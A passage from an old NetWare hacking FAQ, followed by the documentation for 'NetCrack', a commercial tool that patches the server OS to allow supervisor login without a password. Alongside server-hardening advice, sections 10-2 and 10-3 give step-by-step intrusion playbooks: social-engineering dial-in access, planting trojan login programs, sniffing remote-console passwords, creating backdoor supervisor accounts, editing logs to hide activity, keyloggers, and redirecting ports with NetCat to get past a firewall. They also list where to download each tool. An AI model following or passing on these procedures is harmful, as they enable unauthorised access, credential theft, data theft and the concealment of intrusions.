* NWP@UEL.AC.UK for programming under Netware. Send subscription requests to
LISTPROC@UEL.AC.UK.

* MSDOS-ANN@tacom-emh1.army.mil for announcements of SimTel uploads. To
subscribe, send mail to LISTSERV@tacom-emh1.army.mil with the message
SUBSCRIBE MSDOS-ANN.

* Garbo-Ann@Garbo.uwasa.fi for announcements of Garbo uploads. To subscribe,
send mail to Majordomo@Garbo.uwasa.fi with the message SUBSCRIBE GARBO-ANN
.

* CICA-L@ubvm.cc.buffalo.edu for announcements of Windows uploads to CICA. To
subscribe, send mail to Listserv@ubvm.cc.buffalo.edu with the message SUBSCRIBE
CICA-L .

—————————————————————————

08-6. Where are some other Netware FAQs?

The old comp.sys.novell (recently deleted) FAQ is available via ftp at
ftp.eskimo.com in directory /u/m/mstal. The c.s.n FAQ is csn.faq. The Novell
listserv FAQ is faq.txt. It can be FTP directly from its maintainer at
netlab2.usu.edu/misc/faq.txt.

These are also available at URL http://www.eskimo.com/~mstal. Included is a
URL to ftp the latest version of the Novell listserv FAQ, a URL to a web of
the Novell listserv FAQ with many of the ftp sites webbed, and a URL to a
web of the c.s.n faq, created by David Rawling. The Novell listserv FAQ web
URL is http://www.salford.ac.uk/docs/depts/ais/Network/Novell-Faq.html
and the c.s.n FAQ web URL is http://www.efs.mq.edu.au/novell/faq/index.html.

Stanley Toney publishes a bi-weekly Netware Patches and Updates FAQ in
comp.os.netware.announce. It is also available at
ftp://ftp.nsm.smcm.edu/pub/novell/patchfaq.zip.

Floyd Maxwell, fmaxwell@unixg.ubc.ca, keeper of the listserv FAQ, will
automatically mail you the FAQ on a regular basis if you request it of him.

Fauzan Mirza has developed a FAQ for comp.os.netware.security, posting it
there once a month. It is also archive at rtfm.mit.edu in the usenet FAQ
archive.

Don’t forget the alt.2600/#hack FAQ as a general hacking/phreaking
resource, available at rtfm.mit.edu among other locations.

—————————————————————————

08-7. Where can I get the files mentioned in this FAQ?

SETPWD.NLM – ml0.ucs.ed.ac.uk /guest/pc/novell/nlms setpwd.zip
SETSPWD.NLM – netlab2.usu.edu /misc
SETSPASS.NLM – netlab2.usu.edu /misc
NOVELBFH.EXE – jumper.mcc.ac.uk /pub/security/netware novelbfh.zip
KNOCK.EXE – jumper.mcc.ac.uk /pub/security/netware knock.zip
LOGIN.EXE – jumper.mcc.ac.uk /pub/security/netware nwl.zip
PROP.EXE – jumper.mcc.ac.uk /pub/security/netware nwl.zip
CHKNULL.EXE – ftp.fastlane.net /pub/nomad/nw chk0.zip
USERLST.EXE – ml0.ucs.ed.ac.uk /guest/pc/novell/utils jrb212a.zip
LASTHOPE.NLM – ml0.ucs.ed.ac.uk /guest/pc/novell/nlms lasthope.zip
NW-HACK.EXE – jumper.mcc.ac.uk /pub/security/netware nw-hack.zip
SUPER.EXE – ml0.ucs.ed.ac.uk /guest/pc/novell/utils super.zip
CONLOG.NLM – ml0.ucs.ed.ac.uk /guest/pc/novell
X-AWAY.EXE – ml0.ucs.ed.ac.uk /guest/pc/novell/utils x-away.zip
GRPLIST.EXE – ml0.ucs.ed.ac.uk /guest/pc/novell/utils jrb212a.zip
GETEQUIV.EXE – ml0.ucs.ed.ac.uk /guest/pc/novell/utils jrb212a.zip
TRSTLIST.EXE – ml0.ucs.ed.ac.uk /guest/pc/novell/utils jrb212a.zip
SECUREFX.NLM – www.novell.com Search for it in the Tech Section
RCON.EXE – onyx.infonexus.com /pub/ToolsOfTheTrade/Netware
rcon.zip
SMARTPASS – ftp.efs.mq.edu.au /pub/novell smrtpw.zip
BINDERY.EXE – onyx.infonexus.com /pub/ToolsOfTheTrade/Netware
bindery.zip

Duplicates of some of these files exist at my site, ftp.fastlane.net, and
at onyx.infonexus.com.

—————————————————————————

08-8. What are some good books for Netware?

For Netware basics, there are tons. Bill Lawrence has a number of books
that are easy to read but cover things with enough detail for a good
understanding. I recommend the latest stuff from him. Look in your local
bookstore’s techie section. The Novell Press books are also good, but you
tend to pay more for the name.

For programming:

Programmer’s Guide to Netware — (1990) Author: Charles G. Rose. Publisher:
McGraw-Hill, Inc. The bible of Netware programming, dated since Novell has
changed virtually every header file, but still the best. Covers 2.x and 3.x
except for NLM programming. Lots of good source code.

Netware Programmer’s Guide — (1990) Author: John T. McCann. Publisher: M&T
Books. Another dated but classic book with lots of good source for learning.

Novell 4.0 NLM Programming — (1993) Authors: Michael Day, Michael Koontz,
Daniel Marshall. Publisher: Sybex, Inc. Not as complete as I would like, but
I’m picky. Still a classic. Although the title implies 4.x, most of it still
works for 3.x, too. And if you can’t get the kids to sleep, try reading them
the tons of useful source code. Jeez, you may have to leave the closet light
on, though…

—————————————————————————
—————————————————————————

Section 09

Netware APIs

—————————————————————————

09-1. Where can I get the Netware APIs?

Stateside call 1-800-RED-WORD, it’s $50 USD, and includes a 2-user license
of Netware 4.1. Most brand-name compilers will work, but if you’re writing
NLMs you’ll need Watcom’s latest. It’s the only one I know of that will do
NLM linking.

—————————————————————————

09-2. Are there alternatives to Netware’s APIs?

There are three that I am aware of. Here is info on them –

Visual ManageWare by HiTecSoft (602) 970-1025

This product allows development of NLMs and DOS EXEs using a Visual Basic
type development environment. Runtime royalty-free development without
C/C++ and without Watcom. However links are included for C/C++ programs.
The full SDK including compilers is USD$895.00. Pricey but looks good, I
have not used this product.

Here is Teiwaz’ edited report on the other –

[quote]
Here is another source for ‘c’ libs for Netware. He sells both DOS / Windows
style libs. The Small memory model size for DOS, a bit of source is free.

FTP
oak.oakland.edu/SimTel/msdos/c/netclb30.zip
Public Domain Small Mem Model Lib

Author
Adrian Cunnelly – adrian@amcsoft.demon.co.uk

Price
the current price in US Dollars is:

38 Dollars – All model libraries + windows DLL
110 Dollars – Above + Source Code
[endquote]

And take a look at Greg Miller’s site, especially for those Pascal coders
out there:

http://www.ius.indiana.edu/~gmiller/

—————————————————————————
—————————————————————————

Section 10

For Administrators Only

—————————————————————————

10-1. How do I secure my server?

This question is asked by administrators, and I’m sure no hackers will read
this info and learn what you admins might do to thwart hack attacks 😉

One thing to keep in mind, most compromises of data occur from an employee
of the company, not an outside element. They may wish to access sensitive
personnel files, copy and sell company secrets, be disgruntled and wish to
cause harm, or break in for kicks or bragging rights. So trust no one.

Physically Secure The Server –
——————————

This is the simplest one. Keep the server under lock and key. If the server
is at a site where there is a data center (mainframes, midranges, etc) put it
in the same room and treat it like the big boxes. Access to the server’s room
should be controlled minimally by key access, preferably by some type of key
card access which can be tracked. In large shops, a man trap (humanoid that
guards the room) should be in place.

If the server has a door with a lock, lock it (some larger servers have this)
and limit access to the key. This will secure the floppy drive. One paranoid
site I know of keeps the monitor and CPU behind glass, so that the keyboard
and floppy drive cannot be accessed by the same person at the same time.

If you only load NLMs from the SYS:SYSTEM directory, use the SECURE CONSOLE
command to prevent NLMs being loaded from the floppy or other location.

A hacker could load a floppy into the drive and run one of several utility
files to gain access to the server. Or they could steal a backup tape or just
power off the server! By physically securing the server, you can control who
has access to the server room, who has access to the floppy drive, backup
tapes, and the System Console. This step alone will eliminate 75% of attack
potential.

Secure Important Files –
————————

These should be stored offline. You should make copies of the STARTUP.NCF and
AUTOEXEC.NCF files. The bindery or NDS files should be backed up and stored
offsite. All System Login Scripts, Container Scripts, and any robotic or
non-human personal Login Scripts should be copied offline. A robotic or
non-human account would be an account used by an email gateway, backup
machine, etc.

Compile a list of NLMs and their version numbers, and a list of files from
the SYS:LOGIN, SYS:PUBLIC, and SYS:SYSTEM directories.

You should periodically check these files against the originals to ensure
none have been altered.

Replacing the files with different ones (like using itsme’s LOGIN.EXE
instead of Novell’s) will give the hacker access to the entire server. It is
also possible that the hacker will alter .NCF or Login Scripts to bypass
security or to open holes for later attacks.

Make a list of Users and their accesses –
—————————————–

Use a tool like Bindview or GRPLIST.EXE from the JRB Utilities to get a list
of users and groups (including group membership). Once again, keep this
updated and check it frequently against the actual list.

Also run Security (from the SYS:SYSTEM directory) or GETEQUIV.EXE from the
JRB Utilities to determine who has Supervisor access. Look for odd accounts
with Supervisor access like GUEST or PRINTER.

It is also a good idea to look at Trustee Assignments and make sure access is
at a minimum. Check your run from Security to see if access is too great in
any areas, or run TRSTLIST from the JRB Utilities.

Security will turn up some odd errors if SUPER.EXE has been run. If you are
not using SUPER.EXE, delete and rebuild any odd accounts with odd errors
related to the Bindery, particularly if BINDFIX doesn’t fix them yet the
account seems to work okay. If a hacker put in a backdoor using SUPER.EXE,
they could get in and perhaps leave other ways in.

Monitor the Console –
———————

Use the CONLOG.NLM to track the server console activity. This is an excellent
diagnostic tool since error messages tend to roll off the screen. It will
not track what was typed in at the console, but the system’s responses will
be put in SYS:ETC\CONSOLE.LOG. When checking the console, hit the up arrow
to show what commands were last typed in.

While this won’t work in large shops or shops with forgetful users, consider
using the SECUREFX.NLM (or SECUREFX.VAP for 2.x). This sometimes annoying
utility displays the following message on the console and to all the users
after a security breach:

“Security breach against station DETECTED.”

This will also be written to an error log. The following message is also
written the the log and to the console:

“Connection TERMINATED to prevent security compromise”

Turn on Accounting –
——————–

Once Accounting is turned on, you can track every login and logout to the
server, including failed attempts.

Don’t Use the Supervisor Account –
———————————-

Leaving the Supervisor logged in is an invitation to disaster. If packet
signature is not being used, someone could use HACK.EXE and gain access to the
server as Supervisor. HACK spoofs packets to make them look like they came
from the Supervisor to add Supe equivalence to other users.

Also, it implies a machine is logged in somewhere as Supervisor, if it has
been logged in for more than 8 hours chances are it may be unattended.

Use Packet Signature –
———————-

To prevent packet spoofing (i.e. HACK.EXE) enforce packet signature. Add the
following line to your AUTOEXEC.NCF –

SET NCP PACKET SIGNATURE OPTION=3

This forces packet signature to be used. Clients that do not support packet
signature will not be able to access, so they will need to be upgraded if you
have any of these clients.

Use RCONSOLE Sparingly (or not at all) –
—————————————-

When using RCONSOLE you are subject to a packet sniffer getting the packets
and getting the password. While this is normally above the average user’s
expertise, DOS-based programs that put the network interface card into
promiscuous mode and capture every packet on the wire are readily available
on the Internet. The encryption method is not foolproof.

Remember you cannot “detect” a sniffer in use on the wire.

Do NOT use a switch to limit the RCONSOLE password to just the Supervisor
password. All you have done is set the password equal to the switch. If
you use the line “LOAD REMOTE /P=”, Supervisor’s password will get in (it
ALWAYS does) and the RCONSOLE password is now “/P=”. Since the RCONSOLE
password will be in plain text in the AUTOEXEC.NCF file, to help secure
it try adding a non-printing character or a space to the end of the
password.

And while you can use the encryption techniques outlined in 02-8, your
server is still vulnerable to sniffing the password.

Move all .NCF files to a more secure location (3.x and above) –
—————————————————————

Put your AUTOEXEC.NCF file in the same location as the SERVER.EXE file. If a
server is compromised in that access to the SYS:SYSTEM directory is available
to an unauthorized user, you will at least have protected the AUTOEXEC.NCF
file.

A simple trick you can do is “bait” a potential hacker by keeping a false
AUTOEXEC.NCF file in the SYS:SYSTEM with a false RCONSOLE password (among
other things).

All other .NCF files should be moved to the C: drive as well. Remember, the
.NCF file runs as if the commands it contains are typed from the console,
making their security most important.

Use the Lock File Server Console option in Monitor (3.x and above) –
——————————————————————–

Even if the RCONSOLE password is discovered, the Supe password is discovered,
or physical access is gained, a hard to guess password on the console will
stop someone from accessing the console.

Add EXIT to the end of the System Login Script –
————————————————

By adding the EXIT command as the last line in the System Login Script,
you can control to a degree what the user is doing. This eliminates the
potential for personal Login Script attacks, as described in section 03-6.

Upgrade to Netware 4.1 –
————————

Besides making a ton of Novell sales and marketing people very happy, you
will defeat most of the techniques described in this faq. Most well-known
hacks are for 3.11. If you don’t want to make the leap to NDS and 4.1, at
least get current and go to 3.12.

Check the location of RCONSOLE.EXE –
————————————

In 3.11, RCONSOLE.EXE is located in SYS:SYSTEM by default. In 3.12 and 4.1
it is in SYS:SYSTEM and SYS:PUBLIC. You may wish to remove RCONSOLE.EXE from
SYS:PUBLIC, as by default everyone will have access to it.

Remove [Public] from [Root] in 4.1’s NDS-
—————————————–

Get the [Public] Trustee out of the [Root] object’s list of Trustees. Anyone,
even those not logged in, can see virtually all objects in the tree, giving
an intruder a complete list of valid account names to try.

—————————————————————————

10-2. I’m an idiot. Exactly how do hackers get in?

We will use this section as an illustrated example of how these techniques can
be used in concert to gain Supe access on the target server. These techniques
show the other thing that really helps in Netware hacking – a little social
engineering.

Exploitation #1
—————

Assume tech support people are dialing in for after hours support. Call up and
pose as a vendor of security products and ask for tech support person. Called
this person posing as a local company looking for references, ask about remote
dial-in products. Call operator of company and ask for help desk number. Call
help desk after hours and ask for dial-in number, posing as the tech support
person. Explain home machine has crashed and you’ve lost number.

Dial in using the proper remote software and try simple logins and passwords for
dial-in software if required. If you can’t get in call help desk especially if
others such as end users use dial-in.

Upload alternate LOGIN.EXE and PROP.EXE, and edit AUTOEXEC.BAT to run the
alternate LOGIN.EXE locally. Rename PROP.EXE to IBMNBIO.COM and make it hidden.
Before editing AUTOEXEC.BAT change the date and time of the PC so that the date/time stamp reflects the original before the edit.

Dial back in later, rename PROP.EXE and run it to get Accounts and passwords.

Summary – Any keystroke capture program could produce the same results as the
alternate LOGIN.EXE and PROP.EXE, but you end up with a Supe equivalent account.

Exploitation #2
—————

Load a DOS-based packet sniffer, call the sys admin and report a FATAL
DIRECTORY ERROR when trying to access the server. He predictively will use
RCONSOLE to look at the server and his packet conversation can be captured. He
will find nothing wrong (of course).

Study the capture and use the RCON.FAQ to obtain the RCONSOLE password. Log in
as GUEST, create a SYSTEM subdirectory in the home directory (or any directory
on SYS:). Root map a drive to the new SYSTEM, copy RCONSOLE.* to it, and run
RCONSOLE. Once in try to unload CONLOG and upload BURGLAR.NLM to the real
SYS:SYSTEM. Created a Supe user (i.e. NEWUSER) and then typed CLS to clear the
server console screen.

Log in as NEWUSER. Erase BURGLAR.NLM, new SYSTEM directory and its contents.
Run PURGE in those directories. Turn off Accounting if on. Give GUEST Supe
rights. Set toggle with SUPER.EXE for NEWUSER. Run FILER and note SYS:ETC\CONSOLE.LOG (if CONLOG was loaded) owner and create date, as well as
SYS:SYSTEM\SYS$ERR.LOG owner and create date. Edit SYS:ETC\CONSOLE.LOG and
remove BURGLAR.NLM activity, including RCONSOLE activity. Edit and remove
RCONSOLE activity from SYS:SYSTEM\SYS$ERR.LOG as well. After saving files,
run FILER and restore owner and dates if needed. Run PURGE in their directories.
Logout and login as GUEST and set SUPER.EXE toggle. Remove NEWUSER Supe rights
and logout. Login as NEWUSER with SUPER.EXE and remove GUEST Supe rights.
Finally logout and login as GUEST with SUPER.EXE and turn on Accounting if it
was on.

Summary – You have created a backdoor into the system that will not show up as
somthing unusual in the Accounting log. Login as GUEST using SUPER.EXE and turn
off Accounting. Logout and back in as NEWUSER with SUPER.EXE, do what you
need to do (covering file alterations with Filer), and logout. Log back in as
GUEST and turn on Accounting. The NET$ACCT.DAT file shows only GUEST logging in
followed by GUEST logging out.

—————————————————————————

10-3. I have xxx setup and xxx version running. Am I secure?

This question has been coming up lately. A lot. Admins asking me if their
sites are secure. Here is an example from a post to one of the Netware
newsgroups with my comments, as it is generic enough to apply to a number
of locations (in other words, no you are not 100% secure):

>Here is the scenario: A supervisor of a network suspects that he may
>be facing termination of employment in the near future. He is embittered
>and aggravated. As system administrator for the network, he oversees
>the computers that track all business actions. Basically, he can bring
>the organization to it’s knees in a heartbeat, and he knows it. He has
>made comments in passing that it is possible that either time bombs have
>been set in the system, or that a possible “Dead-man’s clutch” may exist
>(if he’s not there to disable some mechanism daily/weekly the system will
>be compromised).

Not nearly as easy to set up in the environment you’ve specified. However,
I’d let that rumor continue so as to waste your time looking for a
dead-man’s clutch. In the meantime, I’d be stealing stuff from those
databases and selling them to the competition.

>Here is the tech specs: A Novell 3.12 server that serves databases, email
>and user files to 30 PC’s running Windows 3.1. The network is attached
>to the Internet. No OS’s other than DOS/Windows and Novell. The
>network is attached to a larger network that is very accessible to the
>public (via physically attached machines, and the Internet). There
>are no firewalls. The supervisor is the only person with supervisor
>password/privileges on the server, as well as the only person who knows
>the details of the network, the server disk layout, the server nlm’s.
>Basically the only person who has been inside the server which is such
>a vitally mission critical system.
>
>Here’s what I have so far:
> 1. quarantine the 30 node network and server by physically
> disabling it’s Ethernet access to the outside world.

This is an interesting step. However your problem returns once you
re-attach.

> 2. make a full system backup of the server before touching
> investigating or touching anything.

If a problem occurs and you restore your backups, any virii, trojans,
and other back doors will get back into the system.

> 3. “secure” the Novell server (see below)

Read my hack FAQ. ftp://ftp.fastlane.net/pub/nomad/nw/faq.zip

You see, if I were to leave a backdoor, I would leave several.

1) I would run BINDFIX and then run a bindery cracker on ALL accounts
on the server against the .OLD bindery files. I would use
ftp://ftp.fastlane.net/pub/nomad/nw/bindery.zip to do this, along with
a huge word list. This should not only get me most passwords on the
system, but get automated passwords as well. For example, Arcserve
5.01g installs an account called CHEY_ARCHSVR with station restrictions
and a password of WONDERLAND. I’d remove the station restrictions and
either use SUPER.EXE to set up CHEY_ARCHSVR as a toggled Supe account,
or just make it plain old Supe equivalent. Most people do not check
these kinds of accounts.

2) I would install the alternate LOGIN.EXE and PROP.EXE to give myself
a way to see new passwords that have been changed. These files can be
found at ftp://ftp.fastlane.net/pub/nomad/nw/nwl.zip, details in the
FAQ.

3) I would delete all zero length personal login files (see the FAQ for
why).

4) Any logins (such as the one possibly used by an SMTP gateway) which
would be normally restricted would be toggled with SUPER.EXE. GUEST
would be toggled.

5) Message files (such as the ones used in displaying error messages)
would be hacked so that security violations would display harmless
messages.

> 4. “secure” all PC’s (see below)

I would install keystroke grabbers on a number of machines, like those
found at ftp://onyx.infonexus.com/pub/ToolsOfTheTrade/DOS/KeyLoggers/

> 5. erect a firewall disabling IPX passage into the network
> but allowing TCP/IP (email services required).

I would use some of these “very public” machines and install a sniffer,
and I would use NetCat to redirect port 25 traffic to a particular
address to a different machine’s telnetd, bypassing the firewall.
ftp://onyx.infonexus.com/pub/ToolsOfTheTrade/Unix/nc100.tgz for NetCat.

With the sniffer it could be possible to get the RCONSOLE password.
See ftp://ftp.fastlane.net/pub/nomad/nw/rcon*.zip for details.

I would make sure that IP is on my server, and make sure XCONSOLE is
running. Once past the firewall, I’d telnet to the server’s IP
address and run either X11 or VT100 remote console sessions with the
server.

> 6. notify the supervisor that he is fired, and take whatever
> actions are necessary to keep him from coming in physical
> contact with the network.

If planned ahead, the supe will have his/her backdoors in place, and this
will not matter. In fact, s/he will probably MAKE SURE that they do not
even look at a machine.

>There’s a gotcha, getting the supervisor password. It would be
>ideal to inadvertently get it, but thats a long shot. The system
>administrator will probably have to be asked for it at step 6, whether
>he gives it to us is IMHO unlikely.

The FAQ tells how you can recover from this easily.

Remember, you’ve eliminated social engineering from your checklist. I’d
attach a modem to a PC for PCanyWhere and then call up stating, “I’m the
vendor your ex-employee hired to dial in and check blah-blah. If I were
you I’d change my dial-in password.” Once in (in the middle of the night)
I’d activate a backdoor and proceed to make your competitor rich.

—————————————————————————

DOCUMENTATION: Advanced NetWare Security Cracker Version 1.00

Advanced NetWare Security Cracker

Version 1.00

NetWork Business Systems
1300 Woodhollow Drive, Suite 5601
Houston, Texas 77057
713-781-9268

WHAT IS NETCRACK?

NetCrack–the Advanced NetWare Security Cracker–is a
software utility for use with networks operating under the
Novell Advanced NetWare network operating system. The
NET$OS.EXE file is patched so that the security information
created with SYSCON is disabled. NetCrack is compatible
with Advanced NetWare 86 and Advanced NetWare 286 Versions
1.00 through 2.15.

HOW DOES NETCRACK WORK?

NETCRACK (TM) installs patches io the NET$OS.EXE file to
disable use of the security information created with SYSCON.
Security data is maintained in the files NET$BIND.SYS and
NET$BVAL.SYS located in SYS:SYSTEM. NETCRACK will not
damage the existing security files. The original security
may be restored by invoking the original unpatched
NET$OS.EXE.

NETCRACK may be used to gain access to a fileserver when the
SUPERVISOR password is unknown. It is necessary to have a
copy of NET$OS.EXE from SYS:SYSTEM or to generate a new
operating system with the correct driver set. This backup
copy of NET$OS.EXE is the target file for the NETCRACK
utility.

To use NETCRACK, boot DOS on the fileserver. Execute
NETCRACK. Select the CRACK option from the menu with
the backup copy of NET$OS.EXE as the target. CHECKSUM
the patched operating system. Then invoke the patched
NET$OS.EXE from Drive A:. This will bring up NetWare.
LOGIN as SUPERVISOR from any workstation. PASSWORD is not
required. The NET$BIND.SYS and NET$BVAL.SYS files may be
flagged Read/Write (RW) and deleted. Then invoke the
original unpatched operating system, login as SUPERVISOR,
and setup new security with SYSCON.

If using NETGEN to create a backup operating system, the
NET$OS.EX1 and NET$OS.EX2 files must be concatenated as
follows:
COPY/B NET$OS.EX1+NET$OS.EX2 NET$OS.EXE

If using NETGEN with high capacity diskettes, NET$OS.EX1 is
the target for NETCRACK.

If you only have 360K diskette drives available, you may use
the program SPLIT to split your patched NET$OS.EXE into two
pieces which will fit on 360K diskettes.

If you have any problems or questions, please call BOB at
NBS Tech Support (713) 781-9268.

LIMITED WARRANTY AND DISCLAIMER

With respect to the physical diskette and/or
computer equipment enclosed, NetWork Business Systems
(“NBS”) warrants the same to be free of defects in materials
and workmanship for a period of 90 days from the date of
purchase. In the event of notification within the
warranty period of defects in material or workmanship,
NBS will replace the defective product. The remedy for
breach of this warranty shall be limited to replacement
and shall not encompass any other damages, including but
not limited to loss of profit, special, incidental,
consequential, or other similar claims. NETWORK BUSINESS
SYSTEMS SPECIFICALLY DISCLAIMS ALL OTHER WARRANTIES,
EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE WITH RESPECT TO DEFECTS IN THE PRODUCT, AND THE
PROGRAM LICENSE GRANTED HEREIN IN PARTICULAR, AND WITHOUT
LIMITING OPERATION OF THE PROGRAM LICENSE WITH RESPECT TO
ANY PARTICULAR APPLICATION, USE, OR PURPOSE. IN NO EVENT
SHALL NBS BE LIABLE FOR ANY LOSS OF PROFIT OR ANY OTHER
COMMERCIAL DAMAGE, INCLUDING BUT NOT LIMITED TO SPECIAL,
INCIDENTAL, CONSEQUENTIAL OR OTHER DAMAGES.

NetWork Business Systems reserves the right to revise
the product and/or the documentation without obligation to
notify any person of such revision.

GOVERNING LAW

This statement shall be construed, interpreted and governed
by the laws of the State of Texas.

LICENSE

The software on the enclosed diskette is the
copyrighted property of NetWork Business Systems. You are
granted a limited license to use this software for a
single computer or network fileserver. To receive
information on updates and new products available from
NetWork Business Systems, inquiries should be sent to:

NetWork Business Systems
1300 Woodhollow Drive, Suite 5601
Houston, Texas 77057
Telephone 713-781-9268

For warranty information, please see the next page.

NetWork Business Systems

PRICE LIST

November 1, 1988

KeyCard Eliminator Version 86 $ 99.00

KeyCard or DCB Eliminator Version 2.0a $ 99.00

KeyCard or DCB Eliminator Version 2.1 $ 99.00

KeyCard or DCB Eliminator Version 2.11 $ 99.00

ELS Utilities $ 59.00

GetDisk $ 59.00

PlugDisk with BustAwrd $ 79.00

BIOS Tools (GetDisk & PlugDisk) $ 99.00

NetCrack $ 99.00

This price list is subject to change without notice.
NetWork Business Systems reserves the right to revise the
product documentation and/or software and/or hardware
without obligation to notify any person of such revisions.
Dealer pricing is available on request.